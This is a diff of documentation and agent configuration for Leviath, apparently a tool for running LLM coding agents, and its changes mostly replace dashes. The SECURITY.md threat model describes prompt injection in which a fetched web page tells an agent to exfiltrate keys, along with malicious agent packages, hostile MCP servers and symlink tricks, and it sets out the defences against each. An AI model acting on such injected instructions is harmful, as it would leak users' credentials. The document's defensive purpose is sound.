+`lev dash` is a full TUI for managing concurrent agents: stage tabs, context-window visualization, markdown rendering, search/filter, sub-agent tree view, and full mouse support. Scroll with the wheel, or click-drag to select text in any pane; releasing the drag copies it to your clipboard (works over SSH via OSC52), and `y` still yanks a whole pane at once. Shift+drag reaches your terminal's native selection. Press **`m`** to open the MCP management screen - add, remove, log in to, and test tool servers without leaving the dashboard.
 
 ## 🌐 API Server
 
-`lev serve` exposes a REST + WebSocket API — integrate from Python, TypeScript, Go, or anything that speaks HTTP. No SDK required.
+`lev serve` exposes a REST + WebSocket API - integrate from Python, TypeScript, Go, or anything that speaks HTTP. No SDK required.
 
 The API can spawn tool-executing agents, so it refuses to start without a token
-(`--token` or, preferably, `LEVIATH_API_TOKEN` — an argument is visible in `ps`).
+(`--token` or, preferably, `LEVIATH_API_TOKEN` - an argument is visible in `ps`).
 It binds to `127.0.0.1` by default and warns loudly if you bind it anywhere else.
 
 ```bash
@@ -407,7 +407,7 @@ lev serve --port 3000
 
 # Exposed beyond your own machine? Bound it:
 lev serve --workdir-root /srv/workspaces --no-remote-yolo
-# `--allow-admin` (the MCP admin endpoints) is off by default — adding an MCP
+# `--allow-admin` (the MCP admin endpoints) is off by default - adding an MCP
 # server writes a spawn command into your config, which is RCE by construction.
 
 # spawn an agent (with a completion webhook + signing secret)
@@ -420,17 +420,17 @@ curl -X POST http://localhost:3000/api/agents \
 
 Covers agent lifecycle, human-in-the-loop interaction, blueprint management, per-agent WebSocket streaming, and webhook callbacks on completion. [Full API reference →](https://leviath.dev/docs/api)
 
-When a run finishes, Leviath POSTs the completion payload to `callback_url`, retrying transient failures (network errors, timeouts, 5xx, 429) with exponential backoff — tune it under `[webhook]` in your config (`max_retries`, `base_delay_ms`, `max_delay_ms`, `timeout_secs`). If you set `callback_secret`, each delivery carries an `X-Leviath-Signature: sha256=<hex>` header — the HMAC-SHA256 of the exact request body keyed on your secret — so the receiver can verify the payload is authentic.
+When a run finishes, Leviath POSTs the completion payload to `callback_url`, retrying transient failures (network errors, timeouts, 5xx, 429) with exponential backoff - tune it under `[webhook]` in your config (`max_retries`, `base_delay_ms`, `max_delay_ms`, `timeout_secs`). If you set `callback_secret`, each delivery carries an `X-Leviath-Signature: sha256=<hex>` header - the HMAC-SHA256 of the exact request body keyed on your secret - so the receiver can verify the payload is authentic.
 
 ## 🔗 Agent Client Protocol (Gas City, Zed, …)
 
-`lev agent-client` serves a Leviath agent over the [Agent **Client** Protocol](https://agentclientprotocol.com) — JSON-RPC 2.0 over stdio, the protocol agent hosts like [Gas City](https://github.com/gastownhall/gascity) and [Zed](https://zed.dev) use to drive a headless agent as a child process. A `session/prompt` runs the blueprint in the shared-world daemon and streams its output back as `session/update` notifications.
+`lev agent-client` serves a Leviath agent over the [Agent **Client** Protocol](https://agentclientprotocol.com) - JSON-RPC 2.0 over stdio, the protocol agent hosts like [Gas City](https://github.com/gastownhall/gascity) and [Zed](https://zed.dev) use to drive a headless agent as a child process. A `session/prompt` runs the blueprint in the shared-world daemon and streams its output back as `session/update` notifications.
 
 ```bash
 lev agent-client --agent coder            # speaks the protocol on stdin/stdout
 ```
 
-To drive a Leviath agent from Gas City, add a provider and point an agent at it — **no Gas City code change is needed**, just config:
+To drive a Leviath agent from Gas City, add a provider and point an agent at it - **no Gas City code change is needed**, just config:
 
 ```toml
 # Gas City provider declaration
@@ -443,14 +443,14 @@ provider = "leviath"
 session  = "acp"          # Gas City's key name for the Agent Client Protocol
 ```
 
-**Interaction & completion.** A `session/prompt` stays in flight (the agent shows as *busy*) until the run **genuinely finishes** — it is never reported "done" while the agent is still waiting on input. How interactions are handled depends on the host:
+**Interaction & completion.** A `session/prompt` stays in flight (the agent shows as *busy*) until the run **genuinely finishes** - it is never reported "done" while the agent is still waiting on input. How interactions are handled depends on the host:
 
 - **Hosts that implement `session/request_permission`** (e.g. Zed) get interactive tool approval in-turn, and drive their own conversation for other questions.
-- **Hosts that don't** (e.g. Gas City, whose ACP path reports interaction unsupported) — the question is surfaced as agent output and the run keeps going; you resolve it through **Leviath's own surfaces** (`lev dash` / `lev respond`), and the turn ends only when the run truly completes. Gas City stays responsive throughout (its prompt wait is non-blocking).
+- **Hosts that don't** (e.g. Gas City, whose ACP path reports interaction unsupported) - the question is surfaced as agent output and the run keeps going; you resolve it through **Leviath's own surfaces** (`lev dash` / `lev respond`), and the turn ends only when the run truly completes. Gas City stays responsive throughout (its prompt wait is non-blocking).
 
 For a clean "sling a task and get a result" flow with Gas City, prefer **autonomous blueprints that run to completion** (or pass `--yolo` to auto-approve tools). Conversational agents that ask follow-up questions will keep the bead *busy* until you answer them in `lev dash`.
 
-> **Two protocols, one acronym.** "ACP" is claimed by two unrelated things: the **Agent Client Protocol** (JSON-RPC/stdio, implemented here — this is the Gas City integration) and the **Agent Communication Protocol** (a REST API from the BeeAI project, not implemented in Leviath). This repo never writes the bare acronym unqualified.
+> **Two protocols, one acronym.** "ACP" is claimed by two unrelated things: the **Agent Client Protocol** (JSON-RPC/stdio, implemented here - this is the Gas City integration) and the **Agent Communication Protocol** (a REST API from the BeeAI project, not implemented in Leviath). This repo never writes the bare acronym unqualified.
 
 ## ⌨️ CLI
 
@@ -481,20 +481,20 @@ servers over **stdio** (a spawned process) or **HTTP** (streamable, with a
 legacy HTTP+SSE fallback). Configure them in `~/.leviath/config.toml`:
 
 ```toml
-# stdio — a locally spawned server
+# stdio - a locally spawned server
 [[mcp_servers]]
 name = "filesystem"
 command = "npx"
 args = ["-y", "@modelcontextprotocol/server-filesystem", "/path"]
 
-# HTTP — a remote server (static token optional; ${VAR} keeps it out of the file)
+# HTTP - a remote server (static token optional; ${VAR} keeps it out of the file)
 [[mcp_servers]]
 name = "navigator"
 url = "https://mcp.example.com/mcp"
 headers = { Authorization = "Bearer ${MY_MCP_TOKEN}" }
 ```
 
-Servers that authenticate via the browser (OAuth) need no token in the config —
+Servers that authenticate via the browser (OAuth) need no token in the config -
 `lev mcp add navigator --url https://mcp.example.com/mcp` detects the login
 requirement and opens your browser automatically. Tokens are stored in
 `~/.leviath/mcp-auth.json` (mode `0600`) and refreshed non-interactively as the
@@ -541,8 +541,8 @@ graph TD
 ```
 
 Every platform-specific system call (Unix file permissions, `setsid` process
-detaching, `SIGTERM`, the OSC52 `/dev/tty` clipboard write) lives in one place —
-**`leviath-sys`** — behind a cross-platform API, so the rest of the workspace is
+detaching, `SIGTERM`, the OSC52 `/dev/tty` clipboard write) lives in one place -
+**`leviath-sys`** - behind a cross-platform API, so the rest of the workspace is
 free of scattered `#[cfg(unix)]`/`#[cfg(windows)]` branches and per-OS test
 coverage stays correct by construction.
 
@@ -556,7 +556,7 @@ cargo test --workspace
 cargo clippy --workspace
 ```
 
-The pre-commit hook installs itself the first time you build or test — no setup step. It enforces formatting, clippy (warnings-as-errors), the full test suite, and the coverage guardrails before every commit.
+The pre-commit hook installs itself the first time you build or test - no setup step. It enforces formatting, clippy (warnings-as-errors), the full test suite, and the coverage guardrails before every commit.
 
 <details>
 <summary>How the pre-commit hook works (and how to refresh it)</summary>
@@ -569,15 +569,15 @@ The hook enforces, before every commit:
 
 - **formatting** (`cargo fmt --check`)
 - **clippy** with warnings-as-errors
-- **doc lints** (`cargo doc` with `-D warnings` — no broken/private intra-doc links or stray HTML)
+- **doc lints** (`cargo doc` with `-D warnings` - no broken/private intra-doc links or stray HTML)
 - the **full test suite**
 - the **coverage-suppression-marker lint** (`ast-grep scan`, if `ast-grep` is installed; CI always enforces it)
 
-It does **not** run the full `cargo xtask coverage` check — that's several minutes, too slow for a local commit gate. CI runs it on every push instead, enforcing 100% for real.
+It does **not** run the full `cargo xtask coverage` check - that's several minutes, too slow for a local commit gate. CI runs it on every push instead, enforcing 100% for real.
 
 ### `ast-grep` (suppression lint)
 
-The suppression-marker scan uses [`ast-grep`](https://ast-grep.github.io), which matches Rust/YAML structurally (via tree-sitter) — rules live in `.sgrules/`. CI installs it automatically and always enforces the scan; the pre-commit hook runs it only if it's installed locally, otherwise it prints a warning and skips (CI is the backstop). Install it once with any of:
+The suppression-marker scan uses [`ast-grep`](https://ast-grep.github.io), which matches Rust/YAML structurally (via tree-sitter) - rules live in `.sgrules/`. CI installs it automatically and always enforces the scan; the pre-commit hook runs it only if it's installed locally, otherwise it prints a warning and skips (CI is the backstop). Install it once with any of:
 
 ```bash
 brew install ast-grep            # macOS / Linuxbrew
@@ -595,11 +595,11 @@ cargo clean -p cargo-husky && cargo test -p xtask
 
 ### Testing policy
 
-The workspace is gated at a hard **100%** on lines, regions, and functions — with no way to opt out. Coverage-suppression markers (`#[cfg(not(test))]`, `coverage(off)`, tarpaulin/lcov/grcov annotations) are banned by the ast-grep lint above, so code can't be hidden from measurement — it has to be refactored until it's testable. The *only* un-unit-tested code is the thin `lev` binary entrypoint (`crates/leviath-cli/src/main.rs`): the composition root that wires real terminal, stdin, network, and subprocess I/O into the library's tested cores. It's excluded from coverage measurement and guarded by a CI check that requires maintainer sign-off to change.
+The workspace is gated at a hard **100%** on lines, regions, and functions - with no way to opt out. Coverage-suppression markers (`#[cfg(not(test))]`, `coverage(off)`, tarpaulin/lcov/grcov annotations) are banned by the ast-grep lint above, so code can't be hidden from measurement - it has to be refactored until it's testable. The *only* un-unit-tested code is the thin `lev` binary entrypoint (`crates/leviath-cli/src/main.rs`): the composition root that wires real terminal, stdin, network, and subprocess I/O into the library's tested cores. It's excluded from coverage measurement and guarded by a CI check that requires maintainer sign-off to change.
 
 ### Running coverage locally
 
-`cargo xtask coverage` gates each workspace package with `cargo llvm-cov --package <pkg> --fail-under-{lines,functions,regions} 100` — llvm-cov does the counting *and* the gating; there's no custom parsing or aggregation. CI enforces a hard **100%** on all three metrics on Linux, macOS, and Windows — any file below 100% fails the build, and a browsable HTML report lands in the gitignored `coverage/` folder. Measurement is deliberately **per-package**, not `--workspace`: `-C instrument-coverage` records every function in every binary that links it (including ones that never call it), and the whole-workspace merge can let a never-run record shadow the covered one — so one package at a time is what keeps llvm-cov's counts accurate. See the doc comment atop `xtask/src/coverage.rs`.
+`cargo xtask coverage` gates each workspace package with `cargo llvm-cov --package <pkg> --fail-under-{lines,functions,regions} 100` - llvm-cov does the counting *and* the gating; there's no custom parsing or aggregation. CI enforces a hard **100%** on all three metrics on Linux, macOS, and Windows - any file below 100% fails the build, and a browsable HTML report lands in the gitignored `coverage/` folder. Measurement is deliberately **per-package**, not `--workspace`: `-C instrument-coverage` records every function in every binary that links it (including ones that never call it), and the whole-workspace merge can let a never-run record shadow the covered one - so one package at a time is what keeps llvm-cov's counts accurate. See the doc comment atop `xtask/src/coverage.rs`.
 
 ```bash
 cargo xtask coverage                                   # full workspace
@@ -619,18 +619,18 @@ Leviath ships on three rolling channels, published automatically from CI:
 | **Beta** | Weekly (Monday) | `beta` | 🟡 Tested |
 | **Stable** | Weekly (Thursday, approval-gated) | `latest` | ✅ Production |
 
-Each channel tag is a *rolling* release — deleted and recreated on every publish so it always points at that channel's newest build. That's what the shell/PowerShell installers resolve (`--channel alpha|beta|stable` → `alpha`/`beta`/`latest`).
+Each channel tag is a *rolling* release - deleted and recreated on every publish so it always points at that channel's newest build. That's what the shell/PowerShell installers resolve (`--channel alpha|beta|stable` → `alpha`/`beta`/`latest`).
 
-Separately, every **stable** deploy also cuts an **immutable versioned release** (`vX.Y.Z`, which carries GitHub's "Latest" badge). Those never change, so they're what Homebrew and Scoop pin to and what `cargo install --tag vX.Y.Z` fetches. Seeing both a `vX.Y.Z` release *and* a `latest` release for the same version is by design — one is the permanent archive, the other the moving pointer.
+Separately, every **stable** deploy also cuts an **immutable versioned release** (`vX.Y.Z`, which carries GitHub's "Latest" badge). Those never change, so they're what Homebrew and Scoop pin to and what `cargo install --tag vX.Y.Z` fetches. Seeing both a `vX.Y.Z` release *and* a `latest` release for the same version is by design - one is the permanent archive, the other the moving pointer.
 
 Install commands for each channel live in the [distribution repo](https://github.com/Sun-Forge-AI/leviath-dist).
 
 ## 🔐 Security
 
 Leviath runs LLM-driven tools on your machine, so [SECURITY.md](SECURITY.md)
-states plainly what it defends against — a malicious agent package, prompt
+states plainly what it defends against - a malicious agent package, prompt
 injection reaching an agent's tools, a hostile MCP server, another local user,
-a repository you pointed it at — and what it does not, including that the model
+a repository you pointed it at - and what it does not, including that the model
 can do anything you granted it and that `namespace` isolation is not a
 filesystem sandbox.
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -6,7 +6,7 @@ Report privately, not as a public issue: use [GitHub's private vulnerability
 reporting](https://github.com/Sun-Forge-AI/leviath/security/advisories/new), or
 email **security@sunforge.ai** if you prefer.
 
-Please include what you need to and nothing you don't — a description of the
+Please include what you need to and nothing you don't - a description of the
 issue, the version or commit, and enough to reproduce it. A proof of concept
 helps but is not required to file.
 
@@ -22,8 +22,8 @@ than as backports to older tags.
 
 ## Threat model
 
-Leviath runs LLM-driven tools — shell commands, file writes, HTTP requests, MCP
-servers, and user-authored Rhai scripts — on your machine. Being clear about
+Leviath runs LLM-driven tools - shell commands, file writes, HTTP requests, MCP
+servers, and user-authored Rhai scripts - on your machine. Being clear about
 what that does and does not defend against matters more than a list of features.
 
 **What we defend against.** These are treated as real attackers, and a bypass is
@@ -32,15 +32,15 @@ a vulnerability:
 - **A malicious or compromised agent package.** An `agent.leviath` you installed
   can only *tighten* what your `~/.leviath/config.toml` allows, never loosen it.
   It cannot grant itself tools you denied, disable taint tracking, or weaken a
-  sandbox you configured — not by turning it off, and not by widening it: it
+  sandbox you configured - not by turning it off, and not by widening it: it
   cannot add a bind-mount you did not grant, re-enable a network you isolated,
   or replace the engine binary. `lev add` prints what a package asks for before
   you run it.
 - **Prompt injection reaching an agent's tools.** A model told by a fetched web
   page to exfiltrate your keys should fail. Script tools cannot read
   credential-shaped environment variables without an explicit allowlist entry,
-  and outbound fetches cannot reach loopback, private, or link-local addresses —
-  including cloud metadata endpoints — without `[security]
+  and outbound fetches cannot reach loopback, private, or link-local addresses -
+  including cloud metadata endpoints - without `[security]
   allow_local_network`. The same address check covers every URL Leviath is
   *given* rather than chooses, including a completion webhook posted through
   `lev serve`.
@@ -55,23 +55,23 @@ a vulnerability:
   daemon mints at startup into its own owner-only directory, so a connection
   that cannot read your files cannot drive your agents. On Unix the socket is
   additionally `0600` and the daemon checks the peer's uid with the kernel.
-  Secret files are created owner-only rather than tightened afterwards — POSIX
-  `0600` on Unix, an ACL granting only you on Windows — and run artifacts are
+  Secret files are created owner-only rather than tightened afterwards - POSIX
+  `0600` on Unix, an ACL granting only you on Windows - and run artifacts are
   owner-only too.
 - **A repository the agent is pointed at.** File tools resolve symlinks and
   refuse paths that leave the workspace, so a checked-in symlink cannot read
   your `~/.ssh`.
 - **The supply chain.** `Cargo.lock` is committed, `cargo-deny` gates advisories
   and licences on every PR, all GitHub Actions are SHA-pinned, and release
-  binaries carry signed build provenance. Every install path — the shell
+  binaries carry signed build provenance. Every install path - the shell
   installer, the PowerShell installer, the Homebrew formulae and the Scoop
-  manifest — verifies the download against the release's `SHA256SUMS` and
+  manifest - verifies the download against the release's `SHA256SUMS` and
   refuses to install on a mismatch. That catches a corrupted download, a swapped
   asset, or a mirror serving something else; it is not a substitute for
   verifying the provenance attestation, which is the stronger check and is
   tracked separately.
 
-**Where the boundary is.** Not gaps we haven't got to — these are the edges of
+**Where the boundary is.** Not gaps we haven't got to - these are the edges of
 what a tool like this can be responsible for, and it is worth being explicit
 about them:
 
@@ -79,7 +79,7 @@ about them:
   allow `shell`, an agent can run any command you can. Leviath's job is to make
   that grant explicit and scoped, not to second-guess it.
 - **`--yolo`.** It waives approval prompts by design. It does *not* override a
-  configured `deny` — that stays terminal — but everything else runs unattended.
+  configured `deny` - that stays terminal - but everything else runs unattended.
   That is the point of the flag.
 - **A compromised provider or model.** Leviath sends your context to whichever
   API you configured. Choosing that endpoint is your decision and we cannot
@@ -87,7 +87,7 @@ about them:
 - **Which sandbox mode you pick.** Tools run on your machine unless you opt into
   `[sandbox]`. The `container` kind isolates the filesystem. The `namespace`
   kind isolates PIDs and optionally the network but **shares the host root
-  filesystem** — it is not a filesystem sandbox, and both the docs and the code
+  filesystem** - it is not a filesystem sandbox, and both the docs and the code
   say so where it is defined. Pick `container` if the filesystem is what you
   need isolated.
 - **A target with neither POSIX modes nor Windows ACLs.** Unix and Windows are
@@ -97,7 +97,7 @@ about them:
 **Known gaps.** None outstanding. Everything the threat model claims is
 implemented and tested on every supported platform. If you find something this
 document claims but the code does not do, that is a vulnerability and we want to
-hear about it — see the top of this file.
+hear about it - see the top of this file.
 
 ## Where secrets live
 
@@ -118,8 +118,8 @@ every local user for the lifetime of the process.
 
 By default secrets live in the `0600` files above, which is the same shape as
 comparable tools and the only arrangement that works headless, in containers,
-over SSH, and on CI. To move them into the OS credential store — macOS Keychain,
-Windows Credential Manager, or the Secret Service elsewhere — so that a stolen
+over SSH, and on CI. To move them into the OS credential store - macOS Keychain,
+Windows Credential Manager, or the Secret Service elsewhere - so that a stolen
 `~/.leviath` directory yields nothing:
 
 ```toml
@@ -139,7 +139,7 @@ lev auth status           # which backend, and what it holds
 
 Both kinds of secret move: provider API keys and MCP OAuth grants. In keychain
 mode `mcp-auth.json` keeps only the *server names*, since the OS stores cannot be
-enumerated and `lev mcp list` still has to be able to say what is logged in — a
+enumerated and `lev mcp list` still has to be able to say what is logged in - a
 server name is not a secret, the access and refresh tokens are.
 
 `lev auth migrate` writes the destination and reads each secret back before
@@ -149,7 +149,7 @@ keychain is configured but unreachable, a write fails loudly rather than putting
 plaintext tokens on disk.
 
 This is opt-in rather than the default because an unavailable keychain is not a
-degraded experience but a broken one — every inference fails at once — and the
+degraded experience but a broken one - every inference fails at once - and the
 environments Leviath is most useful in are the least likely to have a working
 credential store. `lev auth status` reports whether this machine actually has
 one. Builds can also omit credential-store support entirely (the `keychain`
@@ -186,7 +186,7 @@ kind = "container"            # a manifest cannot turn this off
 
 ## Verifying a release
 
-The installers do the checksum half for you — `install.sh`, `install.ps1`, the
+The installers do the checksum half for you - `install.sh`, `install.ps1`, the
 Homebrew formulae and the Scoop manifest all verify against the release's
 `SHA256SUMS` and refuse to install on a mismatch. To check by hand, or to verify
 the attestation as well:
@@ -201,5 +201,5 @@ The attestation is the stronger check, and the reason the checksum alone is not
 enough: anyone who can write a release can rewrite both a binary *and* its
 checksum, but the attestation is signed by GitHub's OIDC identity for the build
 workflow and cannot be forged from inside the release. The installers do not
-verify it yet — attestations are public infrastructure and this repository is
+verify it yet - attestations are public infrastructure and this repository is
 private, so `gh attestation verify` is a manual step until that changes.

--- a/agents/coder/README.md
+++ b/agents/coder/README.md
@@ -2,24 +2,24 @@
 
 A multi-stage coding agent with structured context management. It orients itself in
 the codebase before it writes anything, then verifies continuously rather than
-declaring success at the end. Fully autonomous — see `software-engineer` if you want
+declaring success at the end. Fully autonomous - see `software-engineer` if you want
 a human-approved plan before any code is written.
 
 ## Stages
 
-1. **discover** (Autonomous) — Map the codebase and synthesize a verification workflow
-2. **analyze** (Autonomous) — Understand requirements and create an implementation
+1. **discover** (Autonomous) - Map the codebase and synthesize a verification workflow
+2. **analyze** (Autonomous) - Understand requirements and create an implementation
    plan. Then it chooses: straight to `implement`, or detour through `prototype`.
-3. **prototype** (Autonomous, *elective*) — a spike, not an implementation. Taken only
+3. **prototype** (Autonomous, *elective*) - a spike, not an implementation. Taken only
    when the approach is genuinely uncertain: settle the riskiest assumption with the
    smallest thing that actually runs, record the verdict (and what was **ruled out**)
    in `prototypes`, and rewrite `plan` so `implement` executes evidence rather than a
    guess. If every hypothesis fails it hands back to `analyze` to re-plan.
-4. **implement** (Autonomous) — Write code, capturing a test baseline first and
+4. **implement** (Autonomous) - Write code, capturing a test baseline first and
    re-verifying after each change
-5. **review** (Interactive) — Human review before finalizing changes
-6. **reassess** (Autonomous, *stuck-only*) — see below
-7. **error_recovery** (Autonomous) — Reached only via error edges; diagnoses a failure
+5. **review** (Interactive) - Human review before finalizing changes
+6. **reassess** (Autonomous, *stuck-only*) - see below
+7. **error_recovery** (Autonomous) - Reached only via error edges; diagnoses a failure
    and hands back to implement
 
 ## Stuck detection
@@ -51,9 +51,9 @@ The `discover` stage answers two questions before any code is written: *what is 
 codebase*, and *how do I verify my work in it*. It writes two regions that every later
 stage reads:
 
-- **`discovery`** — language, build system, test runner, the command to run a single
+- **`discovery`** - language, build system, test runner, the command to run a single
   test, directory layout, and local conventions.
-- **`workflow`** — the project's tier (1 greenfield / 2 partial / 3 rich test
+- **`workflow`** - the project's tier (1 greenfield / 2 partial / 3 rich test
   infrastructure) plus three literal lines the later stages execute verbatim:
 
   ```
@@ -63,7 +63,7 @@ stage reads:
   ```
 
 Both are `required`, so the runtime's own gate re-runs `discover` until they are
-actually populated — the synthesized workflow is a commitment the review stage holds
+actually populated - the synthesized workflow is a commitment the review stage holds
 the run to, not a suggestion.
 
 `implement` captures the BASELINE before its first edit and diffs every later run
@@ -74,7 +74,7 @@ at review time.
 
 `repo_files` is seeded by running `git ls-files` once at spawn, so `discover` starts
 from facts instead of spending iterations on `ls`. This executes **before the first
-inference, and therefore before any tool-approval prompt** — it runs inside the entry
+inference, and therefore before any tool-approval prompt** - it runs inside the entry
 stage's sandbox when one is configured, is time- and size-capped, and outside a git
 repo it simply fails and leaves the region empty. Refuse it per-run with
 `--no-seed-commands`, or machine-wide with `[security] allow_seed_commands = false`.
@@ -92,7 +92,7 @@ guard-rail.
 | `conventions` | Pinned | Style/lint rules, pre-loaded from the repo |
 | `architecture` | Pinned | Design docs, pre-loaded from the repo |
 | `plan` | Pinned | The implementation plan; rewritten by `prototype`/`reassess` |
-| `prototypes` | Pinned | Spike findings — what was proven and what was ruled out |
+| `prototypes` | Pinned | Spike findings - what was proven and what was ruled out |
 | `stuck_report` | Pinned | Written by the runtime when a `stuck` edge fires |
 | `discovery` | Pinned | The codebase model (required) |
 | `workflow` | Pinned | The synthesized verification workflow (required) |
@@ -109,10 +109,10 @@ guard-rail.
 
 - **Discovery before implementation** so the agent adapts to unfamiliar codebases
   instead of relying on priors
-- **Elective prototyping** — the planner decides per task whether a spike is worth it
-- **Stuck detection** — a measured escape hatch out of a stage making no progress
+- **Elective prototyping** - the planner decides per task whether a spike is worth it
+- **Stuck detection** - a measured escape hatch out of a stage making no progress
 - **Continuous validation** against a captured baseline, so regressions surface
   immediately
-- **Pinned regions** for discovery/workflow — no edge transform can clear or compact them
+- **Pinned regions** for discovery/workflow - no edge transform can clear or compact them
 - **Compacting regions** for large codebases (auto-summarizes when the threshold is hit)
 - **Interactive review** stage for human approval before finalizing

--- a/agents/coder/agent.leviath
+++ b/agents/coder/agent.leviath
@@ -1,7 +1,7 @@
 [agent]
 name = "coder"
 version = "0.0.1"
-description = "Multi-stage coding agent — discover, analyze, optionally prototype, implement, and review, with stuck detection and graph-based error recovery"
+description = "Multi-stage coding agent - discover, analyze, optionally prototype, implement, and review, with stuck detection and graph-based error recovery"
 entry_stage = "discover"
 
 # Model selection is an ordered fallback list per stage: the first provider
@@ -32,17 +32,17 @@ system_prompt = """
 Before any code is written, answer two questions about THIS repository:
 what is it, and how do I verify my work in it? Do not plan or edit here.
 
-Start from what you already have — do not rediscover it:
+Start from what you already have - do not rediscover it:
 - `repo_files` holds the tracked file list (empty if this isn't a git repo).
 - `conventions` and `architecture` are pre-loaded with the project's style/lint
   rules and design docs.
 - If `.leviath/discovery.md`, `CLAUDE.md`, `AGENTS.md` or
   `.github/copilot-instructions.md` exist, read them and treat them as
-  authoritative — they were written for exactly this purpose.
+  authoritative - they were written for exactly this purpose.
 
 Then fill the gaps with list_dir/read_file, and use bash ONLY to interrogate the
 build/test tooling read-only (e.g. `pytest --collect-only -q`, `cargo test
---list`, `npm run`). Do not modify anything. You have few iterations — spend
+--list`, `npm run`). Do not modify anything. You have few iterations - spend
 them on the area the task touches, not a full tour.
 
 Write `discovery` (context_write) covering:
@@ -55,13 +55,13 @@ Write `discovery` (context_write) covering:
 Then classify the project into exactly one tier and write `workflow`
 (context_write) with the tier, the concrete commands, and the completion bar:
 
-- TIER 1 — no tests, no CI, nothing to verify against. The implement stage must
+- TIER 1 - no tests, no CI, nothing to verify against. The implement stage must
   BUILD its own verification: name the smoke test or assertion it should write,
   and how to run it. Say plainly that there is no baseline to compare against.
-- TIER 2 — some tests exist but coverage is patchy. Name the tests that already
+- TIER 2 - some tests exist but coverage is patchy. Name the tests that already
   cover the area being changed, and the gap the implement stage should fill with
   a new test.
-- TIER 3 — rich test suite. Name the exact subset to run for this task (a full
+- TIER 3 - rich test suite. Name the exact subset to run for this task (a full
   suite run per edit is too slow) and the full-suite command for the final pass.
 
 `workflow` must end with three literal lines the later stages execute verbatim:
@@ -73,7 +73,7 @@ If there is genuinely no way to verify (tier 1 with no runnable code yet), say
 so explicitly in `workflow` rather than inventing a command that won't run.
 """
 
-# Scan output is bulky and single-use — park it in clearable scratch, not the
+# Scan output is bulky and single-use - park it in clearable scratch, not the
 # knowledge regions the later stages read.
 [stages.discover.tool_routing]
 default_region = "conversation"
@@ -101,10 +101,10 @@ max_iterations = 15
 max_revisits = 2
 # Two Always edges out of analyze put it in the LLM-choice lane, so this prompt
 # is what decides whether a task detours through `prototype`. Most tasks should
-# not — the spike is for when the APPROACH is genuinely unknown.
+# not - the spike is for when the APPROACH is genuinely unknown.
 transition_prompt = """
 Plan ready. Choose where to go next:
-- Respond with `prototype` when the APPROACH is uncertain — you are not sure the
+- Respond with `prototype` when the APPROACH is uncertain - you are not sure the
   API/library/algorithm behaves the way the plan assumes, or you could not pin
   down where the behavior you need to change actually lives. A ten-line spike
   settles that far more cheaply than discovering it forty edits into `implement`.
@@ -112,33 +112,33 @@ Plan ready. Choose where to go next:
   pattern that already exists in this codebase, or `discovery` already told you
   where the change belongs.
 
-Prototyping is not free — only take it when you expect to learn something that
+Prototyping is not free - only take it when you expect to learn something that
 would change what you write.
 """
 system_prompt = """
 You are analyzing a coding task to produce a concise implementation plan.
 
-Start by categorizing the task — it drives everything downstream:
+Start by categorizing the task - it drives everything downstream:
 - NEW FEATURE: what to build, where it slots in, which existing patterns to follow.
 - BUGFIX: reproduce first, isolate the root cause, then scope the minimal fix.
 - REFACTOR: preserve behavior; identify the seam and what must stay invariant.
 
 Then:
-1. Read `discovery` and `workflow` first — the discover stage already mapped this
+1. Read `discovery` and `workflow` first - the discover stage already mapped this
    codebase and chose how the work will be verified. Do NOT re-explore what they
    already answer; build on them.
-2. Check `conventions` and `architecture` — pre-loaded style/lint rules and design
+2. Check `conventions` and `architecture` - pre-loaded style/lint rules and design
    docs. Follow them; don't rediscover them.
 3. Estimate scope: which files to create/modify, and roughly how large the change is.
-   Name them — do not create them. This stage has no tool that writes or edits a
+   Name them - do not create them. This stage has no tool that writes or edits a
    file, and calling one is refused; `implement` makes the change you describe.
-4. Identify dependencies — modules, libraries, config, or tests this touches.
+4. Identify dependencies - modules, libraries, config, or tests this touches.
    Use list_dir/read_file ONLY to fill real gaps left by `discovery`. For a fresh
    task with no existing code, skip exploration entirely.
 
 Output a short bullet-list plan: which files to create/modify, what each does, key
 decisions, and the dependencies you found. If `workflow` is TIER 1, the plan must
-include writing the verification the implement stage will run. Be brief — the
+include writing the verification the implement stage will run. Be brief - the
 implement stage does the actual coding and reads this plan from the conversation.
 """
 
@@ -151,11 +151,11 @@ read_file = "codebase"
 list_dir  = "codebase"
 
 [stages.analyze.transitions.implement]
-hint = "The fix location and approach are clear — begin implementation"
+hint = "The fix location and approach are clear - begin implementation"
 transform = "direct"
 
 [stages.analyze.transitions.prototype]
-hint = "The approach is uncertain — spike it before committing to a full implementation"
+hint = "The approach is uncertain - spike it before committing to a full implementation"
 transform = "direct"
 
 [stages.analyze.transitions.error_recovery]
@@ -163,7 +163,7 @@ condition = "error"
 transform = "direct"
 
 # ─── Stage 2b: Prototype (elective) ───────────────────────────────────────────
-# NOT a mandatory hop — `analyze` only routes here when it judges the approach
+# NOT a mandatory hop - `analyze` only routes here when it judges the approach
 # uncertain. The point is to buy information cheaply: prove or kill the riskiest
 # assumption, write down what was ruled out, and REPLACE the plan with one that
 # rests on something that actually ran. `implement` then executes evidence
@@ -177,7 +177,7 @@ max_iterations = 15
 max_revisits = 2
 transition_prompt = """
 Spike complete. Based on what you actually observed:
-- Respond with `implement` if a hypothesis held up — you now know where the
+- Respond with `implement` if a hypothesis held up - you now know where the
   change belongs and what it should do.
 - Respond with `analyze` if every hypothesis failed. The plan rests on a wrong
   premise, so it needs rewriting rather than executing; what you ruled out is in
@@ -191,17 +191,17 @@ that actually runs.
 1. State the assumption in a sentence.
 2. Prove or disprove it: a throwaway script, a failing test that reproduces the
    bug, a bash one-liner that greps for where the behavior really lives. Use the
-   VERIFY command from `workflow` — do not invent your own. For a BUGFIX the
+   VERIFY command from `workflow` - do not invent your own. For a BUGFIX the
    spike IS the reproduction; do not move on without one.
 3. Append the result to the `prototypes` region (context_append): the
    assumption, the verdict, the exact command or snippet that settled it, and
    the file paths you confirmed. Record what you RULED OUT as carefully as what
-   worked — a dead end you don't write down gets retried.
+   worked - a dead end you don't write down gets retried.
 4. Before you leave, write the corrected approach to the `plan` region
    (context_write, key "plan") so `implement` executes what you learned.
 
 Keep this to a handful of iterations. You are buying information, not shipping
-code — do not start the real implementation here, and throw away scaffolding you
+code - do not start the real implementation here, and throw away scaffolding you
 created purely to test a hypothesis.
 """
 
@@ -215,18 +215,18 @@ write_file = "implementation"
 edit_file  = "implementation"
 
 [stages.prototype.transitions.implement]
-hint = "A hypothesis held up — implement it properly"
+hint = "A hypothesis held up - implement it properly"
 transform = "compact"
 
 [stages.prototype.transitions.analyze]
-hint = "Every hypothesis failed — the plan's premise is wrong, re-plan"
